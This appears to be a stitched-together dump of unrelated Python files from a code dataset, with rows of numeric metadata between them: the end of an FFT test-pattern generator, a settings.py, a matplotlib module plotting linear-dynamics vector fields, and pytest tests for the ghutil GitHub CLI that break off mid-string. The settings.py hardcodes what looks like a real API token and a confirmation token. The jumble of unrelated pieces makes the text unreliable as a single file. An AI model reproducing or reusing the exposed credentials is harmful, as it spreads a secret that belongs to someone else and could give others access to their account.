    sig is expected to be a (rows, cols) complex array; i is the test id
    embedded in the pattern file names, signame a label ("Noisy").
    """
    fft=scipy.fft.fftn(sig)
    sigfft = sig
    fftoutput = fft
    # IFFT test: forward input is the raw signal, the reference is its
    # inverse n-dimensional FFT.
    sigifft = sig
    ifftoutput = scipy.fft.ifftn(sigifft)
    # Fixed-point formats: scale the FFT reference by the per-dimension
    # scalings; the /4 on the IFFT side presumably mirrors the kernel's
    # internal scaling — confirm against the test harness (NOTE(review)).
    if mode == Tools.Q15 or mode == Tools.Q31:
        fftoutput = fftoutput * scaling(rows) * scaling(cols)
        ifftoutput = ifftoutput / 4.0
    config.writeInput(i, asReal2D(sigfft),"ComplexInputFFTSamples_%s_%d_%d_" % (signame,rows,cols))
    config.writeInput(i, asReal2D(fftoutput),"ComplexOutputFFTSamples_%s_%d_%d_" % (signame,rows,cols))
    config.writeInput(i, asReal2D(sigifft),"ComplexInputIFFTSamples_%s_%d_%d_" % (signame,rows,cols))
    config.writeInput(i, asReal2D(ifftoutput),"ComplexOutputIFFTSamples_%s_%d_%d_" % (signame,rows,cols))
def writeCFFT2DTests(configs):
    """Write 2-D complex FFT/IFFT patterns for each (rows, cols) in
    FFT2DSIZES, plus one benchmark entry. Returns the next free test id."""
    i = 1
    # 2-D test signal: crossed sinusoids plus uniform noise, normalized.
    fr = 10
    fc = 10
    for (rows,cols) in FFT2DSIZES:
        [X, Y] = np.meshgrid(2 * np.pi * np.arange(cols) * fr,
            2 * np.pi * np.arange(rows) * fc)
        sig = Tools.normalize(np.sin(X) + np.cos(Y) + np.random.uniform(0, 1, X.shape))
        sigc = np.array([[complex(y) for y in x] for x in sig])
        for config,mode in configs:
            writeFFT2DForSignal(config,mode,sigc,i,rows,cols,"Noisy")
        i = i + 1
    #############################
    # Used for benchmarks
    #
    ## Add a new size for benchmark
    # NOTE(review): sigc below is a 1-D length-4096 array, yet it is written
    # with rows=64, cols=64 labels; presumably it should be reshaped to
    # (64, 64) before the call — confirm against the benchmark harness.
    BENCHSIZE = 4096
    sig = noisySineSignal(0.05,0.7,BENCHSIZE)
    sigc = np.array([complex(x) for x in sig])
    for config,mode in configs:
        writeFFT2DForSignal(config,mode,sigc,i,64,64,"Noisy")
    i = i + 1
    return(i)
def writeRFFTTests(configs):
    """Write real FFT/IFFT patterns for every even size in REALFFTSIZES,
    first with a noisy-sine signal then with a step signal, plus one
    4096-point benchmark signal. Returns the next free test id."""
    test_id = 1
    # Noisy-sine test signals, one per real FFT size.
    for nb in REALFFTSIZES:
        sig = noisySineSignal(0.05, 0.7, nb)
        for config, mode in configs:
            writeRFFTForSignal(config, mode, sig, test_id, nb, "Noisy")
        test_id += 1
    # Step test signals, one per real FFT size.
    for nb in REALFFTSIZES:
        sig = stepSignal(0.5, nb)
        for config, mode in configs:
            writeRFFTForSignal(config, mode, sig, test_id, nb, "Step")
        test_id += 1
    # Extra 4096-point noisy-sine signal used for benchmarks.
    benchsize = 4096
    sig = noisySineSignal(0.05, 0.7, benchsize)
    for config, mode in configs:
        writeRFFTForSignal(config, mode, sig, test_id, benchsize, "Noisy")
    test_id += 1
    return test_id
def _makeConfigs(kind):
    """Build the (Tools.Config, format-constant) pairs for one pattern family.

    kind is the family name ("CFFT", "CFFT2D", "RFFT"); patterns are written
    under <args.f>/Patterns/DSP/FFT/<kind>/<kind> with matching parameter
    files under Parameters. One config is created per numeric format.
    """
    patterndir = os.path.join(args.f, "Patterns", "DSP", "FFT", kind, kind)
    paramdir = os.path.join(args.f, "Parameters", "DSP", "FFT", kind, kind)
    formats = [("f64", Tools.F64),
               ("f32", Tools.F32),
               ("f16", Tools.F16),
               ("q31", Tools.Q31),
               ("q15", Tools.Q15)]
    return [(Tools.Config(patterndir, paramdir, ext), mode)
            for ext, mode in formats]

def generatePatterns():
    """Generate all CFFT, CFFT2D and RFFT test/benchmark patterns.

    The per-family config construction (previously duplicated three times)
    is factored into _makeConfigs; configs are built before the progress
    print, preserving the original execution order.
    """
    allConfigs = _makeConfigs("CFFT")
    print("CFFT")
    writeCFFTTests(allConfigs)
    allConfigs = _makeConfigs("CFFT2D")
    print("CFFT2D")
    writeCFFT2DTests(allConfigs)
    allConfigs = _makeConfigs("RFFT")
    print("RFFT")
    writeRFFTTests(allConfigs)
if __name__ == '__main__':
generatePatterns() | 74.852601 | 15,892 | 0.547241 | 5,477 | 25,899 | 2.578419 | 0.056418 | 0.579805 | 0.869282 | 1.158476 | 0.795921 | 0.781476 | 0.778077 | 0.767667 | 0.767667 | 0.734669 | 0 | 0.410933 | 0.235723 | 25,899 | 346 | 15,893 | 74.852601 | 0.302516 | 0.062667 | 0 | 0.445 | 0 | 0 | 0.029543 | 0.015331 | 0 | 0 | 0 | 0 | 0 | 1 | 0.08 | false | 0 | 0.04 | 0.03 | 0.12 | 0.015 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 11 |
23c159fe01ab1b8f0d25719a163608355b6478e6 | 128 | py | Python | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | settings.py | omax83/strorinWind | b404dc4f78552b0f059c6be53db54d59eaeec977 | [
"Apache-2.0"
] | null | null | null | token = '163ff31a1a31ca439673ce1eb9726118fb48bfcacf32a0296ebc46c2c3a2016f438ac710b876e8c72f0f8'
confirmation_token = '13507e18'
| 42.666667 | 95 | 0.90625 | 5 | 128 | 23 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.483607 | 0.046875 | 128 | 2 | 96 | 64 | 0.459016 | 0 | 0 | 0 | 0 | 0 | 0.726563 | 0.664063 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9b0602851695da18f2b1cd70afb70c0d913c36f6 | 14,120 | py | Python | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | src/behdata/pyhsmm/plot.py | ekellbuch/behdata | 4f2ebf60005cef9389a46c973f546ea006aefc7c | [
"MIT"
] | null | null | null | import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import os
# XKCD color names used to give each dynamical state a distinct color.
color_names = [
    "red",
    "windows blue",
    "medium green",
    "dusty purple",
    "orange",
    "amber",
    "clay",
    "pink",
    "greyish",
    "light cyan",
    "steel blue",
    "forest green",
    "pastel purple",
    "mint",
    "salmon",
    "dark brown",
]
# Palette indexed by state; plotting code below wraps via modulo len(colors).
colors = sns.xkcd_palette(color_names)
def plot_vector_field_dynamics(
    Aks,
    bks,
    comb_obs=None,
    xlim=(-3, 3),
    ylim=(-3, 3),
    sharey=True,
    sharex=True,
    nxpts=20,
    nypts=20,
    FIGURE_STORE=False,
    OUTDIR="",
    fname=None,
    plot_center=False,
):
    """Quiver-plot the one-step flow field A_k x + b_k - x of each linear
    dynamical state on a regular grid.

    Parameters
    ----------
    Aks, bks : per-state dynamics matrices A_k and offset vectors b_k.
    comb_obs : list of coordinate index pairs to plot (default [(0, 1)]);
        one row of subplots per pair, one column per state.
    xlim, ylim, nxpts, nypts : grid extent and resolution.
    plot_center : if True, also mark each state's fixed point
        -(A - I)^{-1} b when (A - I) is invertible.
    FIGURE_STORE, OUTDIR, fname : save to OUTDIR/fname (default
        "Vector Field Dynamics.pdf") instead of showing interactively.
    """
    if comb_obs is None:
        comb_obs = [(0, 1)]
    # Regular evaluation grid, flattened to (nxpts*nypts, 2) points.
    x = np.linspace(*xlim, nxpts)
    y = np.linspace(*ylim, nypts)
    X, Y = np.meshgrid(x, y)
    xy = np.column_stack((X.ravel(), Y.ravel()))
    fig, ax = plt.subplots(
        len(comb_obs),
        len(Aks),
        figsize=(len(Aks) * 4, len(comb_obs) * 4),
        sharey=sharey,
        sharex=sharex,
    )
    # Normalize to a 2-D axes array even for a single coordinate pair.
    if np.ndim(ax) == 1:
        ax = ax[None, :]
    # States index the columns, coordinate pairs the rows.
    for state, (Ak, bk) in enumerate(zip(Aks, bks)):
        for pair_id, cpair in enumerate(comb_obs):
            # Restrict the dynamics to the selected 2-D slice.
            As = Ak[np.ix_(cpair, cpair)]
            bs = bk[np.ix_(cpair)]
            # One-step displacement of each grid point: A x + b - x.
            dydt_m = xy.dot(As.T) + bs.T - xy
            ax[pair_id, state].quiver(
                xy[:, 0],
                xy[:, 1],
                dydt_m[:, 0],
                dydt_m[:, 1],
                color=colors[state % len(colors)],
                headwidth=5.0,
            )
            if plot_center:
                try:
                    # Fixed point of x' = A x + b: solve (A - I) c = -b.
                    center = -np.linalg.solve(As - np.eye(As.shape[1]), bs)
                    # BUG FIX: previously called ax.plot(...) on the 2-D axes
                    # ARRAY, which always raised AttributeError and fell into
                    # the bare except, printing the "not invertible" message
                    # unconditionally. Plot on the current subplot instead.
                    ax[pair_id, state].plot(
                        center[0],
                        center[1],
                        'o',
                        color=colors[state % len(colors)],
                        markersize=4,
                    )
                except np.linalg.LinAlgError:
                    # (A - I) singular: no unique fixed point for this state.
                    print("Dynamics are not invertible!")
            ax[pair_id, state].set_title(
                "$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
            )
            ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
            # y label only on the first column (axes share y).
            ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
    plt.tight_layout()
    if FIGURE_STORE:
        if fname is None:
            fname = "Vector Field Dynamics.pdf"
        plt.savefig(os.path.join(OUTDIR, fname))
    else:
        plt.show()
    return
def plot_vector_field_dynamics_formatted(
    Aks,
    bks,
    num_states,
    comb_obs=None,
    num_cols=3,
    states_order=None,
    plot_center=True,
    xlim=(-5, 5),
    ylim=(-5, 5),
    sharey=True,
    sharex=True,
    nxpts=10,
    nypts=10,
    fontsize=12,
    figsize=(9,5),
    FIGURE_STORE=False,
    OUTDIR="",
    fname=None,
):
    """Quiver-plot the per-state flow fields on a compact grid of subplots.

    One subplot per state, arranged in num_cols columns; optionally marks
    each state's fixed point -(A - I)^{-1} b. states_order selects/permutes
    which states are drawn (default 0..num_states-1; must be a permutation
    of all states when given). Saves to OUTDIR/fname when FIGURE_STORE,
    otherwise shows interactively.
    """
    if comb_obs is None:
        comb_obs = [(0, 1)]
    # Regular evaluation grid, flattened to (nxpts*nypts, 2) points.
    x = np.linspace(*xlim, nxpts)
    y = np.linspace(*ylim, nypts)
    X, Y = np.meshgrid(x, y)
    xy = np.column_stack((X.ravel(), Y.ravel()))
    from math import ceil
    fig, axarr = plt.subplots(
        ceil(num_states / num_cols),
        num_cols,
        figsize=figsize,
        sharey=sharey,
        sharex=sharex,
    )
    if np.ndim(axarr) == 1:
        axarr = axarr[None, :]
    axarr = axarr.flatten()
    # Hide the unused trailing subplots of the grid.
    for ii, ax in enumerate(axarr):
        if ii >= num_states:
            ax.axis('off')
    # FIX: states_order previously used a mutable default argument ([]);
    # use a None sentinel with identical behavior for [] / None callers.
    if states_order is None or not np.any(states_order):
        states_order = np.arange(num_states)
    else:
        assert len(np.unique(states_order)) == num_states
    for state_id, (state, ax) in enumerate(zip(states_order, axarr)):
        Ak = Aks[state]
        bk = bks[state]
        for pair_id, cpair in enumerate(comb_obs):
            # Restrict the dynamics to the selected 2-D slice.
            As = Ak[np.ix_(cpair, cpair)]
            bs = bk[np.ix_(cpair)]
            # One-step displacement of each grid point: A x + b - x.
            dydt_m = xy.dot(As.T) + bs.T - xy
            ax.quiver(
                xy[:, 0],
                xy[:, 1],
                dydt_m[:, 0],
                dydt_m[:, 1],
                color=colors[state % len(colors)],
                headwidth=5.0,
            )
            if plot_center:
                try:
                    # Fixed point of x' = A x + b: solve (A - I) c = -b.
                    center = -np.linalg.solve(As - np.eye(As.shape[1]), bs)
                    ax.plot(center[0],
                            center[1],
                            'o',
                            color=colors[state % len(colors)],
                            markersize=6)
                except np.linalg.LinAlgError:
                    # FIX: was a bare except; only a singular (A - I) is the
                    # expected failure here.
                    print("Dynamics are not invertible!")
            ax.set_title(
                "$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1), fontsize=fontsize)
            ax.set_xlabel("$x_{{t, {} }}$".format(cpair[0]),
                          fontsize=fontsize, labelpad=10)
            ax.set_ylabel("$x_{{t, {} }}$".format(cpair[1]),
                          fontsize=fontsize, labelpad=10)
            ax.set_xticks([])
            ax.set_yticks([])
    plt.tight_layout()
    if FIGURE_STORE:
        if fname is None:
            fname = "Vector Field Dynamics.pdf"
        plt.savefig(os.path.join(OUTDIR, fname))
    else:
        plt.show()
    return
def plot_vector_field_dynamics_data(
Aks,
bks,
data,
states,
comb_obs=None,
sharey=True,
sharex=True,
FIGURE_STORE=False,
OUTDIR="",
fontsize=10,
fname=None,
):
# single data set
if comb_obs is None:
comb_obs = [(0, 1)]
matplotlib.rcParams.update({'font.size': fontsize})
fig, ax = plt.subplots(
len(comb_obs),
len(Aks),
figsize=(len(Aks) * 4, len(comb_obs) * 4),
sharey=sharey,
sharex=sharex,
)
if np.ndim(ax) == 1:
ax = ax[None, :]
# State indices the columns
for state, (Ak, bk) in enumerate(zip(Aks, bks)):
# Select pair of coordinates
x_t = data[states == state, :]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax[pair_id, state].quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
# ax[pair_id, state].set_title(
# "$A_{} x_{{t, {}{}}} + b_{} - x_t$".format(state + 1,
# cpair[0],
# cpair[1],
# state + 1)
# )
ax[pair_id, state].set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
)
# share x
ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
# share y
ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
plt.close()
return
def plot_vector_field_dynamics_datas(
Aks,
bks,
datas,
states,
comb_obs=None,
sharey=True,
sharex=True,
FIGURE_STORE=False,
OUTDIR="",
fname=None,
):
# if you see an error check if you should be running datas instead
if comb_obs is None:
comb_obs = [(0, 1)]
fig, ax = plt.subplots(
len(comb_obs),
len(Aks),
figsize=(len(Aks) * 4, len(comb_obs) * 4),
sharey=sharey,
sharex=sharex,
)
if np.ndim(ax) == 1:
ax = ax[None, :]
for data_id, (data, dstates) in enumerate(zip(datas, states)):
# State indices the columns
print(' Plotting for data set {}'.format(data_id))
for state, (Ak, bk) in enumerate(zip(Aks, bks)):
# Select pair of coordinates
x_t = data[dstates == state, :]
# drop nan
bad = np.isnan(x_t).any(1)
x_t = x_t[~bad]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax[pair_id, state].quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
# ax[pair_id, state].set_title(
# "$A_{} x_{{t, {}{}}} + b_{} - x_t$".format(state + 1,
# cpair[0],
# cpair[1],
# state + 1)
# )
ax[pair_id, state].set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1, state + 1)
)
# share x
ax[pair_id, state].set_xlabel("$x_{{t, {} }}$".format(cpair[0]))
# share y
ax[pair_id, 0].set_ylabel("$x_{{t, {} }}$".format(cpair[1]))
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
plt.close()
return
def plot_vector_field_dynamics_datas_formatted(
Aks,
bks,
datas,
states,
num_states,
num_cols=3,
plot_center=True,
fontsize=12,
comb_obs=None,
sharey=True,
figsize=(9, 5),
sharex=False,
states_order=[],
FIGURE_STORE=False,
OUTDIR="",
fname=None,
):
# if you see an error check if you should be running datas instead
if comb_obs is None:
comb_obs = [(0, 1)]
matplotlib.rcParams.update({'font.size': fontsize})
from math import ceil
fig, axarr = plt.subplots(
ceil(num_states/num_cols),
num_cols,
figsize=figsize,
sharey=sharey,
sharex=sharex,
)
if np.ndim(axarr) == 1:
axarr = axarr[None, :]
axarr = axarr.flatten()
for ii, ax in enumerate(axarr):
if ii >= num_states:
ax.axis('off')
if not np.any(states_order):
states_order = np.arange(num_states)
else:
assert len(np.unique(states_order)) == num_states
for data_id, (data, dstates) in enumerate(zip(datas, states)):
# State indices the columns
print(' Plotting for data set {}'.format(data_id))
for state, ax in zip(states_order, axarr):
Ak = Aks[state]
bk = bks[state]
print('Plotting state {}'.format(state))
#ax = axarr[state]
# Select pair of coordinates
x_t = data[dstates == state, :]
bad = np.isnan(x_t).any(1)
x_t = x_t[~bad]
if not np.any(x_t):
print('No data with states {}'.format(state))
continue
for pair_id, cpair in enumerate(comb_obs):
As = Ak[np.ix_(cpair, cpair)]
bs = bk[np.ix_(cpair)]
xy = x_t[:, cpair]
dydt_m = xy.dot(As.T) + bs.T - xy
ax.quiver(
xy[:, 0],
xy[:, 1],
dydt_m[:, 0],
dydt_m[:, 1],
color=colors[state % len(colors)],
headwidth=5.0,
)
if plot_center:
try:
center = -np.linalg.solve(As-np.eye(As.shape[1]), bs)
ax.plot(center[0],
center[1], 'o', color=colors[state % len(colors)],
markersize=5
)
except:
print("Dynamics are not invertible!")
ax.set_title(
"$A_{} x_t + b_{} - x_t$".format(state + 1,
state+1),
fontsize=fontsize)
#ax.set_title('State z={}'.format(state + 1))
#ax.set_title()
#if state % num_cols == 0:
ax.set_xlabel("$x_{t,1}$", fontsize=fontsize, labelpad=10)
ax.set_ylabel("$x_{t,2}$", fontsize=fontsize, labelpad=10)
ax.tick_params(labelsize=fontsize)
ax.set_xticks([])
ax.set_yticks([])
plt.tight_layout()
if FIGURE_STORE:
if fname is None:
fname = "Vector Field Dynamics on Inputs.pdf"
plt.savefig(os.path.join(OUTDIR, fname))
else:
plt.show()
#plt.close()
return | 27.364341 | 90 | 0.447875 | 1,635 | 14,120 | 3.724159 | 0.118043 | 0.013467 | 0.021022 | 0.02562 | 0.870915 | 0.836262 | 0.826244 | 0.808343 | 0.808343 | 0.799639 | 0 | 0.01686 | 0.420326 | 14,120 | 516 | 91 | 27.364341 | 0.727062 | 0.105453 | 0 | 0.807388 | 0 | 0 | 0.061521 | 0 | 0 | 0 | 0 | 0 | 0.005277 | 1 | 0.013193 | false | 0 | 0.01847 | 0 | 0.044855 | 0.023747 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
f1d56e186e9da1d6624de60c0c21172aa7a87643 | 35,462 | py | Python | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 6 | 2017-05-29T19:29:44.000Z | 2020-04-05T00:01:02.000Z | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 2 | 2017-06-29T09:39:32.000Z | 2020-01-07T22:48:02.000Z | test/test_cli_issue.py | jwodder/ghutil | f0b903a76177cd49f5d48ac9890609f4da9071d9 | [
"MIT"
] | 1 | 2017-06-11T16:43:47.000Z | 2017-06-11T16:43:47.000Z | import json
import os
from pathlib import Path
import webbrowser
import click
import pytest
# Directory holding the data files fed to commands under test (--body inputs).
FILEDIR = Path(__file__).parent / 'data' / 'files'

# One newline-terminated paragraph of lorem ipsum, reused as a canned issue
# body by the `issue new` tests below.
LOREM = "Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.\n"
# Expected `issue read` / `pr read` rendering of the open issue
# jwodder/ghutil#1: header fields, body, then its single comment.
READ_ISSUE = '''\
Issue: click plugins / cache / local datastore
State: open
Author: roscopecoltran
Date: 2017-06-29 05:39:32 -0400 (last updated 2017-06-29 12:33:16 -0400)
Labels: Nice to Have
Assignees: \n
Hi,
Hope u are all well !
Was wondering if adding click's plugins or pluggy as a feature for ghutil was on your roadmap. It would allow to be non-intrusive for some external plugins if we could define a plugin registry via a yaml file.
From my perspective, I just wanted to extend the use of some ghutil "repos" related command (eg. repos starred) and to append some meta-data (mainly in Json/YAML format) from different sources:
Additional info from github api:
- Add topics for any repo related queries
- Add readme for starred repo for indexation
- Add files list per branch for making faster any source code sifting, pattern matching
examples of plugins for a cached registry of enhanced meta data:
- https://github.com/thombashi/ghscard (mainly to build a chrome extension and some hover cards"
- https://github.com/asciimoo/searx
- https://github.com/nexB/scancode-toolkit
- https://github.com/GitMarkTeam/gitmark
- https://github.com/douban/linguist
- https://github.com/porter-io/tagg-python
Ideally, I wanted to complete a **ghutil** with a local datastore, sqlite or mysql, and, later on, I will had some classifiers on gh topics attributes with gensim/elastic search but that's another milestone ^^.
Any feedback or inputs are welcomed, have a great day !
Cheers,
Richard
comment 312021247
Author: jwodder
Date: 2017-06-29 12:31:32 -0400
I do not currently have any plans for supporting plugins, and any such plans would be very far down on my to-do list for this project.
'''
def test_issue_read_issue(cmd):
    """`issue read` renders an open issue's headers, body, and comments."""
    result = cmd("issue", "read", "ghutil/1")
    assert result.exit_code == 0
    assert result.output == READ_ISSUE
def test_pr_read_issue(cmd):
    """`pr read` accepts a plain issue and renders it identically."""
    result = cmd("pr", "read", "ghutil/1")
    assert result.exit_code == 0
    assert result.output == READ_ISSUE
# Expected `issue read` / `pr read` rendering of the closed issue
# pypa/pip#3876, including milestone, closer, and reaction counts.
READ_CLOSED_ISSUE = '''\
Issue: support git refs in @ syntax
State: closed
Author: zzzeek
Date: 2016-07-26 19:27:19 -0400 (last updated 2017-04-08 06:21:30 -0400)
Labels: \nAssignees: \nMilestone: 10.0
Closed: 2017-04-08 06:21:04 -0400 by xavfernandez
Reactions: 👍 5
We'd like to be able to put paths to gerrit reviews in requirements files.
Given a gerrit like https://review.openstack.org/#/c/345601/6, the path given for a git pull looks like:
git pull https://git.openstack.org/openstack/oslo.db refs/changes/01/345601/6
pip syntax we'd expect would be:
```
.venv/bin/pip install -e git+https://git.openstack.org/openstack/oslo.db@refs/changes/01/345601/6#egg=oslo.db
```
current output:
```
Obtaining oslo.db from git+https://git.openstack.org/openstack/oslo.db@refs/changes/01/345601/6#egg=oslo.db
Cloning https://git.openstack.org/openstack/oslo.db (to refs/changes/01/345601/6) to ./.venv/src/oslo.db
Could not find a tag or branch 'refs/changes/01/345601/6', assuming commit.
error: pathspec 'refs/changes/01/345601/6' did not match any file(s) known to git.
Command "git checkout -q refs/changes/01/345601/6" failed with error code 1 in /home/classic/.venv/src/oslo.db
```
comment 268571420
Author: pradyunsg
Date: 2016-12-21 11:44:43 -0500 (last updated 2016-12-21 11:44:54 -0500)
@sshnaidm Please use Github reactions. They're meant for exactly this.
'''
def test_issue_read_closed_issue(cmd):
    """A closed issue's read view includes milestone, closer, and reactions."""
    result = cmd("issue", "read", "pypa/pip/3876")
    assert result.exit_code == 0
    assert result.output == READ_CLOSED_ISSUE
def test_pr_read_closed_issue(cmd):
    """`pr read` renders a closed plain issue the same way `issue read` does."""
    result = cmd("pr", "read", "pypa/pip/3876")
    assert result.exit_code == 0
    assert result.output == READ_CLOSED_ISSUE
def test_issue_list_pypa_packaging(cmd):
    """`issue list` prints one repo-qualified issue number per line."""
    result = cmd("issue", "list", "pypa/packaging")
    assert result.exit_code == 0
    expected_numbers = [
        111, 109, 108, 107, 106, 101, 100, 99, 95, 92,
        90, 88, 87, 86, 84, 83, 82, 81, 74, 34,
    ]
    assert result.output == "".join(
        "pypa/packaging/{}\n".format(n) for n in expected_numbers
    )
def test_issue_list_milestone(cmd):
    """Filtering by --milestone restricts the listing to that milestone."""
    result = cmd("issue", "list", "pypa/pip", "-m", "Improve User Experience")
    assert result.exit_code == 0
    expected_numbers = [4685, 4649, 4575, 1668]
    assert result.output == "".join(
        "pypa/pip/{}\n".format(n) for n in expected_numbers
    )
def test_issue_list_milestone_label(cmd):
    """--milestone and --label filters combine (both must match)."""
    result = cmd(
        "issue", "list",
        "pypa/pip",
        "-m", "Improve User Experience",
        "-l", "discussion needed",
    )
    assert result.exit_code == 0
    assert result.output == "pypa/pip/4685\npypa/pip/4649\npypa/pip/4575\n"
def test_issue_list_milestone_two_labels(cmd):
    """Repeating --label narrows the listing further (all labels required)."""
    result = cmd(
        "issue", "list",
        "pypa/pip",
        "-m", "Improve User Experience",
        "-l", "discussion needed",
        "-l", "topic - user-scheme",
    )
    assert result.exit_code == 0
    assert result.output == "pypa/pip/4575\n"
def test_issue_show_issue(cmd):
    """`issue show` dumps the issue's (trimmed) API representation as a
    one-element JSON list.

    NOTE(review): field values (ids, timestamps) are exact, so the HTTP
    layer is evidently canned/recorded by the `cmd` fixture — confirm there.
    """
    r = cmd('issue', 'show', 'ghutil/1')
    assert r.exit_code == 0
    assert r.output == '''\
[
{
"assignees": [],
"body": "Hi,\\r\\n\\r\\nHope u are all well !\\r\\n\\r\\nWas wondering if adding click's plugins or pluggy as a feature for ghutil was on your roadmap. It would allow to be non-intrusive for some external plugins if we could define a plugin registry via a yaml file.\\r\\n\\r\\nFrom my perspective, I just wanted to extend the use of some ghutil \\"repos\\" related command (eg. repos starred) and to append some meta-data (mainly in Json/YAML format) from different sources:\\r\\n\\r\\nAdditional info from github api:\\r\\n- Add topics for any repo related queries\\r\\n- Add readme for starred repo for indexation\\r\\n- Add files list per branch for making faster any source code sifting, pattern matching\\r\\n\\r\\nexamples of plugins for a cached registry of enhanced meta data:\\r\\n- https://github.com/thombashi/ghscard (mainly to build a chrome extension and some hover cards\\"\\r\\n- https://github.com/asciimoo/searx\\r\\n- https://github.com/nexB/scancode-toolkit\\r\\n- https://github.com/GitMarkTeam/gitmark\\r\\n- https://github.com/douban/linguist\\r\\n- https://github.com/porter-io/tagg-python\\r\\n\\r\\nIdeally, I wanted to complete a **ghutil** with a local datastore, sqlite or mysql, and, later on, I will had some classifiers on gh topics attributes with gensim/elastic search but that's another milestone ^^.\\r\\n\\r\\nAny feedback or inputs are welcomed, have a great day !\\r\\n\\r\\nCheers,\\r\\nRichard",
"closed_at": null,
"closed_by": null,
"comments": 1,
"created_at": "2017-06-29T09:39:32Z",
"html_url": "https://github.com/jwodder/ghutil/issues/1",
"id": 239420922,
"labels": [
"Nice to Have"
],
"locked": false,
"milestone": null,
"number": 1,
"reactions": {},
"state": "open",
"title": "click plugins / cache / local datastore",
"updated_at": "2017-06-29T16:33:16Z",
"url": "https://api.github.com/repos/jwodder/ghutil/issues/1",
"user": "roscopecoltran"
}
]
'''
def test_issue_show_pr(cmd):
    """`issue show` also accepts a pull request and dumps it in the same
    JSON-list form (note the `pull` html_url and nonempty `reactions`)."""
    r = cmd('issue', 'show', 'vinta/awesome-python/875')
    assert r.exit_code == 0
    assert r.output == '''\
[
{
"assignees": [],
"body": "## What is this Python project?\\r\\n\\r\\n`attrs` allows you to declare your class's instance attributes once, and it then takes care of generating the boilerplate `__init__`, `__eq__`, `__repr__`, etc. methods for you, turning this:\\r\\n\\r\\n```\\r\\nfrom functools import total_ordering\\r\\n@total_ordering\\r\\nclass Point3D(object):\\r\\n    def __init__(self, x, y, z):\\r\\n        self.x = x\\r\\n        self.y = y\\r\\n        self.z = z\\r\\n\\r\\n    def __repr__(self):\\r\\n        return (self.__class__.__name__ +\\r\\n                (\\"(x={}, y={}, z={})\\".format(self.x, self.y, self.z)))\\r\\n\\r\\n    def __eq__(self, other):\\r\\n        if not isinstance(other, self.__class__):\\r\\n            return NotImplemented\\r\\n        return (self.x, self.y, self.z) == (other.x, other.y, other.z)\\r\\n\\r\\n    def __lt__(self, other):\\r\\n        if not isinstance(other, self.__class__):\\r\\n            return NotImplemented\\r\\n        return (self.x, self.y, self.z) < (other.x, other.y, other.z)\\r\\n```\\r\\n\\r\\ninto this:\\r\\n\\r\\n```\\r\\nimport attr\\r\\n@attr.s\\r\\nclass 